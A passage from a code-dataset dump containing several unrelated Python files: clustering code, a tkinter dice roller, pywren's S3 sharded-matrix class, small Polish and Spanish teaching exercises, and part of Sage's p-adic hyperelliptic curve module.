[cluster[0], cluster[1], matrix[cluster[0]][cluster[1]], temp]\n \t\tlflag = lflag + 1\n \t\tcluster_numbers[str(lflag)] = temp\n \t\ttraversed_points.append(cluster[0])\n \t\ttraversed_points.append(cluster[1])\n \tK = K + 1\n\n return [matrix, linkage_matrix]\n\nclass Proximity_Matrix:\n \"\"\"\n This class is called in the very beginning, when calculating the proximity matrix for\n the first time from the data.\n \"\"\"\n\n def distance(self, sample1, sample2):\n \"\"\"Short summary.\n\n Parameters\n ----------\n sample1 : list\n A sample in the data.\n sample2 : list\n A sample in the data.\n\n Returns\n -------\n type : float\n The distance between the two samples.\n \"\"\"\n edist = 0\n for i in range(len(sample1)):\n \tdist = 0\n \tfor j in range(len(sample1[i])):\n \t\tdist = dist + abs(sample1[i][j] - sample2[i][j])\n \t\tedist = edist + dist\n\n return math.sqrt(edist)\n\n def raw_matrix(self, data):\n \"\"\"\n This function calculates the first proximity matrix.\n\n Parameters\n ----------\n data : list\n The processed data, obtained from raw data.\n\n Returns\n -------\n type : list\n The very first proximity matrix.\n \"\"\"\n matrix = []\n\n for sample1 in data:\n \tl = []\n \tfor sample2 in data:\n \t\tdist = self.distance(sample1, sample2)\n \t\tl.append(dist)\n \tmatrix.append(l)\n\n return matrix\n\nif __name__ == \"__main__\":\n\n agglomerative = Agglomerative_Hierarchical()\n proximity = Proximity_Matrix()\n\n parser = argparse.ArgumentParser(description=\"Choose hierarchy link\")\n parser.add_argument('link', help=\"Which link to use\")\n args = parser.parse_args()\n link = vars(args)['link']\n c_flag = None\n # test = True\n test = False # Flags for running the program in testing mode.\n\n if test: # The proximity matrix to be used for testing.\n matrix = [[0, 0.23, 0.22, 0.37, 0.34, 0.24],\n \t\t [0.23, 0, 0.14, 0.19, 0.14, 0.24],\n \t\t [0.22, 0.14, 0, 0.16, 0.28, 0.1],\n \t\t [0.37, 0.19, 0.16, 0, 0.28, 0.22],\n \t\t [0.34, 0.14, 0.28, 0.28, 0, 0.39],\n \t\t [0.24, 0.24, 0.1, 0.22,0.39, 0]]\n else:\n matrix_file = \"proximity_matrix.pkl\"\n if os.path.isfile(matrix_file):\n \tmatrix_f = open(matrix_file, 'rb')\n \tmatrix = pickle.load(matrix_f)\n \tmatrix_f.close()\n else:\n \tdfile = open('matrix_data.txt', 'rb')\n \tdata = pickle.load(dfile)\n \t# data = data[0:100]\n \tmatrix = proximity.raw_matrix(data)\n \tmatrix_f = open(matrix_file, 'wb')\n \tpickle.dump(matrix, matrix_f)\n \tmatrix_f.close()\n \tdfile.close()\n\n if link == \"single-link\":\n c_flag = 0\n elif link == \"complete-link\":\n c_flag = 1\n elif link == \"group-average\":\n c_flag = 2\n\n linkage_matrix = agglomerative.clustering(matrix, c_flag)[1]\n\n pprint(linkage_matrix)\n\n # fig = plt.figure(figsize=(8, 4))\n # dendrogram = dendrogram(linkage_matrix) # Draw dendrogram of final clusters.\n # plt.show()\n","sub_path":"Hierarchical Clustering/Agglomerative/agglomerative_clustering.py","file_name":"agglomerative_clustering.py","file_ext":"py","file_size_in_byte":9597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"253199893","text":"import random\nfrom tkinter import *\n\n\nroot = Tk()\n\nroot.geometry(\"1920x1200\")\nl1 = Label(root,\n fg=\"white\",\n bg=\"black\",\n width=1920,\n height=1200,\n font=('times', 200))\n\n\ndef dice_roll():\n \"\"\"\n Dice roll\n \"\"\"\n number = ['\\u2680', '\\u2681', '\\u2682', '\\u2683', '\\u2684', '\\u2685']\n l1.config(text=f'{random.choice(number)}{random.choice(number)}')\n l1.pack(pady=10, padx=10)\n\n\nb1 = Button(root, text='Roll the Die', relief=RAISED, command=dice_roll)\nb1.place(x=880, y=0)\n\nroot.mainloop()\n","sub_path":"dice_roll_gui.py","file_name":"dice_roll_gui.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"126519154","text":"import boto3\nimport cloudpickle\nimport itertools\nimport concurrent.futures as fs\nimport io\nimport numpy as np\nimport time\n\n\ndef list_all_keys(bucket, prefix):\n client = boto3.client('s3')\n objects = client.list_objects(Bucket=bucket, Prefix=prefix, Delimiter=prefix)\n keys = list(map(lambda x: x['Key'], objects['Contents']))\n truncated = objects['IsTruncated']\n next_marker = objects.get('NextMarker')\n while (truncated):\n objects = client.list_objects(Bucket=bucket, Prefix=prefix, Delimiter=prefix, Marker=next_marker)\n truncated = objects['IsTruncated']\n next_marker = objects.get('NextMarker')\n keys += list(map(lambda x: x['Key'], objects['Contents']))\n return list(filter(lambda x: len(x) > 0, keys))\n\ndef block_key_to_block(key):\n try:\n block_key = key.split(\"/\")[-1]\n blocks_split = block_key.split(\"_\")\n b0_start = int(blocks_split[0])\n b0_end = int(blocks_split[1])\n b1_start = int(blocks_split[3])\n b1_end = int(blocks_split[4])\n return ((b0_start, b0_end), (b1_start, b1_end))\n except:\n return None\n\nclass ShardedMatrix(object):\n def __init__(self, key,\n shard_sizes,\n shape=None,\n bucket=None,\n prefix='pywren.linalg/'):\n self.bucket = bucket\n self.prefix = prefix\n self.key = key\n self.key_base = prefix + self.key + \"/\"\n shard_size_0 = shard_sizes[0]\n shard_size_1 = shard_sizes[1]\n header = self.__read_header__()\n self.replication_factor = 1\n\n if header is None and shape is None:\n raise Exception(\"header doesn't exist and no shape provided\")\n if not (header is None) and shape is None:\n self.shard_size_0 = header.shard_size_0\n self.shard_size_1 = header.shard_size_1\n self.shape = header.shape\n else:\n self.shape = shape\n self.shard_size_0 = shard_size_0\n self.shard_size_1 = shard_size_1\n\n if self.shard_size_0 is None:\n raise Exception(\"No shard_0_size provided\")\n if self.shard_size_1 is None:\n self.shard_size_1 = self.shape[1]\n\n self.symmetric = False\n self.shard_sizes = (self.shard_size_0, self.shard_size_1)\n self.__write_header__()\n\n @property\n def blocks_exist(self):\n #slow\n prefix = self.prefix + self.key\n all_keys = list_all_keys(self.bucket, prefix)\n return list(filter(lambda x: x != None, map(block_key_to_block, all_keys)))\n\n @property\n def blocks(self):\n return self._blocks()\n\n @property\n def block_idxs_exist(self):\n all_block_idxs = self.block_idxs\n all_blocks = self.blocks\n blocks_exist = set(self.blocks_exist)\n block_idxs_exist = []\n for i, block in enumerate(all_blocks):\n if block in blocks_exist:\n block_idxs_exist.append(all_block_idxs[i])\n return block_idxs_exist\n\n @property\n def blocks_not_exist(self):\n blocks = set(self.blocks)\n block_exist = set(self.blocks_exist)\n return list(filter(lambda x: x, list(block_exist.symmetric_difference(blocks))))\n\n @property\n def block_idxs_not_exist(self):\n block_idxs = set(self.block_idxs)\n block_idxs_exist = set(self.block_idxs_exist)\n return list(filter(lambda x: x, list(block_idxs_exist.symmetric_difference(block_idxs))))\n\n\n\n\n @property\n def block_idxs(self):\n return self._block_idxs()\n\n def _blocks(self, axis=None):\n\n blocks_x = [(i, i + self.shard_size_0) for i in range(0, self.shape[0], self.shard_size_0)]\n\n if blocks_x[-1][1] > self.shape[0]:\n blocks_x.pop()\n\n if blocks_x[-1][1] < self.shape[0]:\n blocks_x.append((blocks_x[-1][1], self.shape[0]))\n\n\n blocks_y = [(i, i + self.shard_size_1) for i in range(0, self.shape[1], self.shard_size_1)]\n\n if blocks_y[-1][1] > self.shape[1]:\n blocks_y.pop()\n\n if blocks_y[-1][1] < self.shape[1]:\n blocks_y.append((blocks_y[-1][1], self.shape[1]))\n\n if axis is None:\n return list(itertools.product(blocks_x, blocks_y))\n elif axis == 0:\n return blocks_x\n elif axis == 1:\n return blocks_y\n else:\n raise Exception(\"Invalid Axis\")\n\n def _block_idxs(self, axis=None):\n blocks_x = list(range(len(self._blocks(axis=0))))\n blocks_y = list(range(len(self._blocks(axis=1))))\n\n if axis is None:\n return list(itertools.product(blocks_x, blocks_y))\n elif axis == 0:\n return blocks_x\n elif axis == 1:\n return blocks_y\n else:\n raise Exception(\"Invalid Axis\")\n\n def idx_to_block_idx(self, idx_1, idx_2):\n blocks_x = self._blocks(0)\n blocks_y = self._blocks(1)\n\n block_x = -1\n block_y = -1\n\n for i, (blk_start, blk_end) in enumerate(blocks_x):\n if blk_start <= idx_1 and blk_end > idx_1:\n block_x = i\n offset_x = idx_1 - blk_start\n\n for i, (blk_start, blk_end) in enumerate(blocks_y):\n if blk_start <= idx_2 and blk_end > idx_2:\n block_y = i\n offset_y = idx_2 - blk_start\n\n if block_x == -1:\n raise Exception(\"Index 0 out of bounds\")\n\n if block_y == -1:\n raise Exception(\"Index 1 out of bounds\")\n\n return block_x, block_y, offset_x, offset_y\n\n\n def __getitem__(self, idxs):\n idx_1, idx_2 = idxs\n\n if isinstance(idx_1, slice):\n raise Exception(\"Slicing in first index not implemented\")\n\n if isinstance(idx_2, slice):\n if idx_2.start != None or idx_2.step != None or idx_2.stop != None:\n raise Exception(\"Only full row slices supported\")\n blocks_y_idxs = self._block_idxs(axis=1)\n blocks = []\n block_x, block_y, offset_x, offset_y = self.idx_to_block_idx(idx_1, 0)\n for blk_idx in blocks_y_idxs:\n blocks.append(self.get_block(block_x, blk_idx))\n return np.hstack(blocks)[offset_x, :]\n\n else:\n block_x, block_y, offset_x, offset_y = self.idx_to_block_idx(idx_1, idx_2)\n block_data = self.get_block(block_x, block_y)\n return block_data[offset_x, offset_y]\n\n def __get_matrix_shard_key__(self, start_0, end_0, start_1, end_1, replicate=0):\n rep = str(replicate)\n key_string = \"{0}_{1}_{2}_{3}_{4}_{5}_{6}\".format(start_0, end_0, self.shard_size_0, start_1, end_1, self.shard_size_1, rep)\n return self.key_base + key_string\n\n\n\n def __read_header__(self):\n client = boto3.client('s3')\n try:\n key = self.key_base + \"header\"\n header = cloudpickle.loads(client.get_object(Bucket=self.bucket, Key=key)['Body'].read())\n except:\n header = None\n return header\n\n\n def __write_header__(self):\n client = boto3.client('s3')\n key = self.key_base + \"header\"\n client.put_object(Key=key, Bucket = self.bucket, Body=cloudpickle.dumps(self), ACL=\"bucket-owner-full-control\")\n return 0\n\n def __shard_idx_to_key__(self, shard_0, shard_1, replicate=0):\n N = self.shape[0]\n D = self.shape[1]\n start_0 = shard_0*self.shard_size_0\n start_1 = shard_1*self.shard_size_1\n end_0 = min(start_0+self.shard_size_0, N)\n end_1 = min(start_1+self.shard_size_1, D)\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, replicate)\n return key\n\n def __s3_key_to_byte_io__(self, key):\n n_tries = 0\n max_n_tries = 5\n bio = None\n client = boto3.client('s3')\n while bio is None and n_tries <= max_n_tries:\n try:\n bio = io.BytesIO(client.get_object(Bucket=self.bucket, Key=key)['Body'].read())\n except Exception as e:\n n_tries += 1\n if bio is None:\n raise Exception(\"S3 Read Failed\")\n return bio\n\n def __save_matrix_to_s3__(self, X, out_key, client=None):\n if (client == None):\n client = boto3.client('s3')\n outb = io.BytesIO()\n np.save(outb, X)\n response = client.put_object(Key=out_key, Bucket=self.bucket, Body=outb.getvalue(),ACL=\"bucket-owner-full-control\")\n return response\n\n def shard_matrix(self, X, executor=None, n_jobs=1):\n bidxs = self.block_idxs\n blocks = self.blocks\n if (executor is None):\n executor = fs.ThreadPoolExecutor(n_jobs)\n\n futures = []\n for ((bidx_0, bidx_1),(block_0, block_1)) in zip(bidxs, blocks):\n bstart_0, bend_0 = block_0\n bstart_1, bend_1 = block_1\n future = executor.submit(self.put_block, bidx_0, bidx_1, X[bstart_0:bend_0, bstart_1:bend_1])\n futures.append(future)\n fs.wait(futures)\n [f.result() for f in futures]\n return 0\n\n\n def get_block(self, block_0, block_1, client=None, flip=False):\n client = boto3.client('s3')\n if (flip):\n block_0, block_1 = block_1, block_0\n s = time.time()\n r = np.random.choice(self.replication_factor, 1)[0]\n key = self.__shard_idx_to_key__(block_0, block_1, r)\n bio = self.__s3_key_to_byte_io__(key)\n e = time.time()\n s = time.time()\n X_block = np.load(bio)\n e = time.time()\n\n if (flip):\n X_block = X_block.T\n return X_block\n\n def put_block(self, block_0, block_1, block):\n\n start_0 = block_0*self.shard_size_0\n end_0 = min(block_0*self.shard_size_0 + self.shard_size_0, self.shape[0])\n shape_0 = end_0 - start_0\n\n start_1 = block_1*self.shard_size_1\n end_1 = min(block_1*self.shard_size_1 + self.shard_size_1, self.shape[1])\n shape_1 = end_1 - start_1\n\n\n if (block.shape != (shape_0, shape_1)):\n raise Exception(\"Incompatible block size: {0} vs {1}\".format(block.shape, (shape_0,shape_1)))\n\n for i in range(self.replication_factor):\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, i)\n self.__save_matrix_to_s3__(block, key)\n\n\n def delete_block(self, block_0, block_1):\n client = boto3.client('s3')\n\n start_0 = block_0*self.shard_size_0\n end_0 = min(block_0*self.shard_size_0 + self.shard_size_0, self.shape[0])\n shape_0 = end_0 - start_0\n\n start_1 = block_1*self.shard_size_1\n end_1 = min(block_1*self.shard_size_1 + self.shard_size_1, self.shape[1])\n shape_1 = end_1 - start_1\n\n deletions = []\n for i in range(self.replication_factor):\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, i)\n deletions.append(client.delete_object(Key=key, Bucket=self.bucket))\n return deletions\n\n","sub_path":"pywren/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":11017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"18166735","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# liczby23.py\n\ndef liczby2():\n \"\"\"\n Funkcja drukuje wszystkie liczby dwucyfrowe, w których cyfry nie powtarzają się. Funkcja zwraca ich liczbę. Wykluczone liczby: 11, 22, 33 itd.\n \"\"\"\n suma = 0\n liczba = 0\n for i in range(1, 10):\n for j in range(0, 10):\n if i != j:\n print(\"{}{} \".format(i, j), end=\"\")\n suma = suma + 1\n print(suma)\n return suma\n\n\ndef main(args):\n print(\"Liczb 2-cyfrowych:\", liczby2())\n return 0\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"python/liczby23/liczby23.py","file_name":"liczby23.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"327539004","text":"# ---diccionarios --\nparticipantes = {\n\t\t\t\t 'Nombre': 'Manuel', \n\t\t\t\t 'Edad' : 20 ,\n\t\t\t\t 'Cursos': ['Python ' , 'React ' , ' Django'],\n\t\t\t\t }\nprint (participantes ['Nombre'])\nprint (participantes ['Edad'])\nprint (participantes ['Cursos'])\n\nparticipantes['telegono'] = 9811031944\nparticipantes['ocupacion'] = 'Developer'\n\nprint(\"==========\")\nprint(participantes)\n\njugador = {}\n\njugador['nickname'] = 'FunrryMonster'\njugador['score'] = 0\n\nprint (jugador)\n\njugador['score'] = 60\nprint(\"El score actual de el jugador \" + jugador ['nickname'] + \" es \" + str (jugador['score']))\n\navengers = {\n\t'cap': {\n\t\t'name': 'Steve',\n\t\t'lastname': 'Roger',\n\t\t'avenger_name':'Capitan America',\n\t\t},\n\t'stark': {\n\t\t'name': 'Anthony Edward',\n\t\t'lastname': 'Stark',\n\t\t'avenger_name':'Iroman',\n\n\t},\n\t'MrGreen' : {\n\t\t'name': 'Bruce',\n\t\t'lastname': 'Banner',\n\t\t'avenger_name':'Hulk',\n\n\t}\t\n\n}\n\nfor username , avenger_info in avengers.items():\n\tprint('\\n Username ' + username )\n\tfullname = avenger_info['name'] + \" \" + avenger_info['lastname']\n\tavenger_name = avenger_info['avenger_name']\n\n\tprint(\"\\t Nombre real \" + fullname)\n\tprint (\"\\t Nombre vengador\" + avenger_name)\n\n","sub_path":"Ejercicio_7.py","file_name":"Ejercicio_7.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"629370990","text":"\"\"\"\nHyperelliptic curves over a `p`-adic field\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2007 Robert Bradshaw \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\n\nfrom sage.rings.all import (PowerSeriesRing, PolynomialRing, ZZ, QQ,\n pAdicField, GF, RR, RationalField, Infinity)\nfrom sage.functions.log import log\nfrom sage.modules.free_module import VectorSpace\nfrom sage.matrix.constructor import matrix, identity_matrix\nfrom sage.modules.free_module_element import vector\n\nfrom sage.schemes.curves.projective_curve import ProjectivePlaneCurve_field\nfrom sage.misc.functional import cyclotomic_polynomial\nfrom sage.functions.other import binomial\n\n\nfrom . import hyperelliptic_generic\n\nclass HyperellipticCurve_padic_field(hyperelliptic_generic.HyperellipticCurve_generic,\n ProjectivePlaneCurve_field):\n\n # The functions below were prototyped at the 2007 Arizona Winter School by\n # Robert Bradshaw and Ralf Gerkmann, working with Miljan Brakovevic and\n # Kiran Kedlaya\n # All of the below is with respect to the Monsky Washnitzer cohomology.\n\n def local_analytic_interpolation(self, P, Q, prec=None):\n \"\"\"\n For points `P`, `Q` in the same residue disc,\n this constructs an interpolation from `P` to `Q`\n (in homogeneous coordinates) in a power series in\n the local parameter `t`, with precision equal to\n the `p`-adic precision of the underlying ring.\n\n INPUT:\n\n - P and Q points on self in the same residue disc\n\n OUTPUT:\n\n Returns a point `X(t) = ( x(t) : y(t) : z(t) )` such that:\n\n (1) `X(0) = P` and `X(1) = Q` if `P, Q` are not in the infinite disc\n (2) `X(P[0]^g/P[1]) = P` and `X(Q[0]^g/Q[1]) = Q` if `P, Q` are in the infinite disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n\n A non-Weierstrass disc::\n\n sage: P = HK(0,3)\n sage: Q = HK(5, 3 + 3*5^2 + 2*5^3 + 3*5^4 + 2*5^5 + 2*5^6 + 3*5^7 + O(5^8))\n sage: x,y,z, = HK.local_analytic_interpolation(P,Q)\n sage: x(0) == P[0], x(1) == Q[0], y(0) == P[1], y.polynomial()(1) == Q[1]\n (True, True, True, True)\n\n A finite Weierstrass disc::\n\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(1 + 3*5^2)\n sage: x,y,z = HK.local_analytic_interpolation(P,Q)\n sage: x(0) == P[0], x.polynomial()(1) == Q[0], y(0) == P[1], y(1) == Q[1]\n (True, True, True, True)\n\n The infinite disc::\n\n sage: P = HK.lift_x(5^-2)\n sage: Q = HK.lift_x(4*5^-2)\n sage: x,y,z = HK.local_analytic_interpolation(P,Q)\n sage: x = x/z\n sage: y = y/z\n sage: x(P[0]/P[1]) == P[0]\n True\n sage: x(Q[0]/Q[1]) == Q[0]\n True\n sage: y(P[0]/P[1]) == P[1]\n True\n sage: y(Q[0]/Q[1]) == Q[1]\n True\n\n An error if points are not in the same disc::\n\n sage: x,y,z = HK.local_analytic_interpolation(P,HK(1,0))\n Traceback (most recent call last):\n ...\n ValueError: (5^-2 + O(5^6) : 5^-3 + 4*5^2 + 5^3 + 3*5^4 + O(5^5) : 1 + O(5^8)) and (1 + O(5^8) : 0 : 1 + O(5^8)) are not in the same residue disc\n\n TESTS:\n\n Check that :trac:`26005` is fixed::\n\n sage: L = Qp(5, 100)\n sage: HL = H.change_ring(L)\n sage: P = HL.lift_x(1 + 2*5^2)\n sage: Q = HL.lift_x(1 + 3*5^2)\n sage: x,y,z=HL.local_analytic_interpolation(P, Q)\n sage: x.polynomial().degree()\n 98\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03)\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n if prec == None:\n prec = self.base_ring().precision_cap() + 2\n if not self.is_same_disc(P,Q):\n raise ValueError(\"%s and %s are not in the same residue disc\"%(P,Q))\n disc = self.residue_disc(P)\n t = PowerSeriesRing(self.base_ring(), 't', prec).gen(0)\n if disc == self.change_ring(self.base_ring().residue_field())(0,1,0): # Infinite disc\n x,y = self.local_coordinates_at_infinity(2*prec)\n g = self.genus()\n return (x*t**(2*g+1),y*t**(2*g+1),t**(2*g+1))\n if disc[1] != 0: # non-Weierstrass disc\n x = P[0]+t*(Q[0]-P[0])\n pts = self.lift_x(x, all=True)\n if pts[0][1][0] == P[1]:\n return pts[0]\n else:\n return pts[1]\n else: # Weierstrass disc\n S = self.find_char_zero_weier_point(P)\n x,y = self.local_coord(S, prec)\n a = P[1]\n b = Q[1] - P[1]\n y = a + b*t\n x = x.polynomial()(y).add_bigoh(x.prec())\n return (x, y, 1)\n\n def weierstrass_points(self):\n \"\"\"\n Return the Weierstrass points of self defined over self.base_ring(),\n that is, the point at infinity and those points in the support\n of the divisor of `y`\n\n EXAMPLES::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: C.weierstrass_points()\n [(0 : 1 + O(11^5) : 0), (7 + 10*11 + 4*11^3 + O(11^5) : 0 : 1 + O(11^5))]\n \"\"\"\n f, h = self.hyperelliptic_polynomials()\n if h != 0:\n raise NotImplementedError()\n return [self((0,1,0))] + [self((x, 0, 1)) for x in f.roots(multiplicities=False)]\n\n def is_in_weierstrass_disc(self, P):\n \"\"\"\n Checks if `P` is in a Weierstrass disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,3)\n sage: HK.is_in_weierstrass_disc(P)\n False\n sage: Q = HK(0,1,0)\n sage: HK.is_in_weierstrass_disc(Q)\n True\n sage: S = HK(1,0)\n sage: HK.is_in_weierstrass_disc(S)\n True\n sage: T = HK.lift_x(1+3*5^2); T\n (1 + 3*5^2 + O(5^8) : 2*5 + 4*5^3 + 3*5^4 + 5^5 + 3*5^6 + O(5^7) : 1 + O(5^8))\n sage: HK.is_in_weierstrass_disc(T)\n True\n\n AUTHOR:\n\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n return not (P[1].valuation() == 0 and P != self(0, 1, 0))\n\n def is_weierstrass(self, P):\n \"\"\"\n Checks if `P` is a Weierstrass point (i.e., fixed by the hyperelliptic involution)\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,3)\n sage: HK.is_weierstrass(P)\n False\n sage: Q = HK(0,1,0)\n sage: HK.is_weierstrass(Q)\n True\n sage: S = HK(1,0)\n sage: HK.is_weierstrass(S)\n True\n sage: T = HK.lift_x(1+3*5^2); T\n (1 + 3*5^2 + O(5^8) : 2*5 + 4*5^3 + 3*5^4 + 5^5 + 3*5^6 + O(5^7) : 1 + O(5^8))\n sage: HK.is_weierstrass(T)\n False\n\n AUTHOR:\n\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n return (P[1] == 0 or P[2] == 0)\n\n def find_char_zero_weier_point(self, Q):\n \"\"\"\n Given `Q` a point on self in a Weierstrass disc, finds the\n center of the Weierstrass disc (if defined over self.base_ring())\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(5^-2)\n sage: S = HK(1,0)\n sage: T = HK(0,1,0)\n sage: HK.find_char_zero_weier_point(P)\n (1 + O(5^8) : 0 : 1 + O(5^8))\n sage: HK.find_char_zero_weier_point(Q)\n (0 : 1 + O(5^8) : 0)\n sage: HK.find_char_zero_weier_point(S)\n (1 + O(5^8) : 0 : 1 + O(5^8))\n sage: HK.find_char_zero_weier_point(T)\n (0 : 1 + O(5^8) : 0)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n if not self.is_in_weierstrass_disc(Q):\n raise ValueError(\"%s is not in a Weierstrass disc\"%Q)\n points = self.weierstrass_points()\n for P in points:\n if self.is_same_disc(P,Q):\n return P\n\n def residue_disc(self, P):\n \"\"\"\n Gives the residue disc of `P`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: HK.residue_disc(P)\n (1 : 0 : 1)\n sage: Q = HK(0,3)\n sage: HK.residue_disc(Q)\n (0 : 3 : 1)\n sage: S = HK.lift_x(5^-2)\n sage: HK.residue_disc(S)\n (0 : 1 : 0)\n sage: T = HK(0,1,0)\n sage: HK.residue_disc(T)\n (0 : 1 : 0)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n xPv = P[0].valuation()\n yPv = P[1].valuation()\n F = self.base_ring().residue_field()\n HF = self.change_ring(F)\n if P == self(0,1,0):\n return HF(0,1,0)\n elif yPv > 0:\n if xPv > 0:\n return HF(0,0,1)\n if xPv == 0:\n return HF(P[0].expansion(0), 0,1)\n elif yPv ==0:\n if xPv > 0:\n return HF(0, P[1].expansion(0),1)\n if xPv == 0:\n return HF(P[0].expansion(0), P[1].expansion(0),1)\n else:\n return HF(0,1,0)\n\n def is_same_disc(self, P, Q):\n \"\"\"\n Checks if `P,Q` are in same residue disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(5^-2)\n sage: S = HK(1,0)\n sage: HK.is_same_disc(P,Q)\n False\n sage: HK.is_same_disc(P,S)\n True\n sage: HK.is_same_disc(Q,S)\n False\n \"\"\"\n return self.residue_disc(P) == self.residue_disc(Q)\n\n def tiny_integrals(self, F, P, Q):\n r\"\"\"\n Evaluate the integrals of `f_i dx/2y` from `P` to `Q` for each `f_i` in `F`\n by formally integrating a power series in a local parameter `t`\n\n `P` and `Q` MUST be in the same residue disc for this result to make sense.\n\n INPUT:\n\n - F a list of functions `f_i`\n - P a point on self\n - Q a point on self (in the same residue disc as P)\n\n OUTPUT:\n\n The integrals `\\int_P^Q f_i dx/2y`\n\n EXAMPLES::\n\n sage: K = pAdicField(17, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: TP = E.teichmuller(P);\n sage: x,y = E.monsky_washnitzer_gens()\n sage: E.tiny_integrals([1,x],P, TP) == E.tiny_integrals_on_basis(P,TP)\n True\n\n ::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.tiny_integrals([1],P,Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8))\n\n Note that this fails if the points are not in the same residue disc::\n\n sage: S = C(0,1/4)\n sage: C.tiny_integrals([1,x,x^2,x^3],P,S)\n Traceback (most recent call last):\n ...\n ValueError: (11^-2 + O(11^3) : 11^-5 + 8*11^-2 + O(11^0) : 1 + O(11^5)) and (0 : 3 + 8*11 + 2*11^2 + 8*11^3 + 2*11^4 + O(11^5) : 1 + O(11^5)) are not in the same residue disc\n\n \"\"\"\n x, y, z = self.local_analytic_interpolation(P, Q) #homogeneous coordinates\n x = x/z\n y = y/z\n dt = x.derivative() / (2*y)\n integrals = []\n g = self.genus()\n for f in F:\n try:\n f_dt = f(x,y)*dt\n except TypeError: #if f is a constant, not callable\n f_dt = f*dt\n if x.valuation() != -2:\n I = sum(f_dt[n]/(n+1) for n in range(f_dt.degree() + 1)) # \\int_0^1 f dt\n else:\n If_dt = f_dt.integral().laurent_polynomial()\n I = If_dt(Q[0]**g/Q[1]) - If_dt(P[0]**g/P[1])\n integrals.append(I)\n return vector(integrals)\n\n def tiny_integrals_on_basis(self, P, Q):\n r\"\"\"\n Evaluate the integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n by formally integrating a power series in a local parameter `t`.\n `P` and `Q` MUST be in the same residue disc for this result to make sense.\n\n INPUT:\n\n - P a point on self\n - Q a point on self (in the same residue disc as P)\n\n OUTPUT:\n\n The integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n sage: K = pAdicField(17, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: TP = E.teichmuller(P);\n sage: E.tiny_integrals_on_basis(P, TP)\n (17 + 14*17^2 + 17^3 + 8*17^4 + O(17^5), 16*17 + 5*17^2 + 8*17^3 + 14*17^4 + O(17^5))\n\n ::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.tiny_integrals_on_basis(P,Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8), 3*11 + 10*11^2 + 8*11^3 + 9*11^4 + 7*11^5 + O(11^6), 4*11^-1 + 2 + 6*11 + 6*11^2 + 7*11^3 + O(11^4), 11^-3 + 6*11^-2 + 2*11^-1 + 2 + 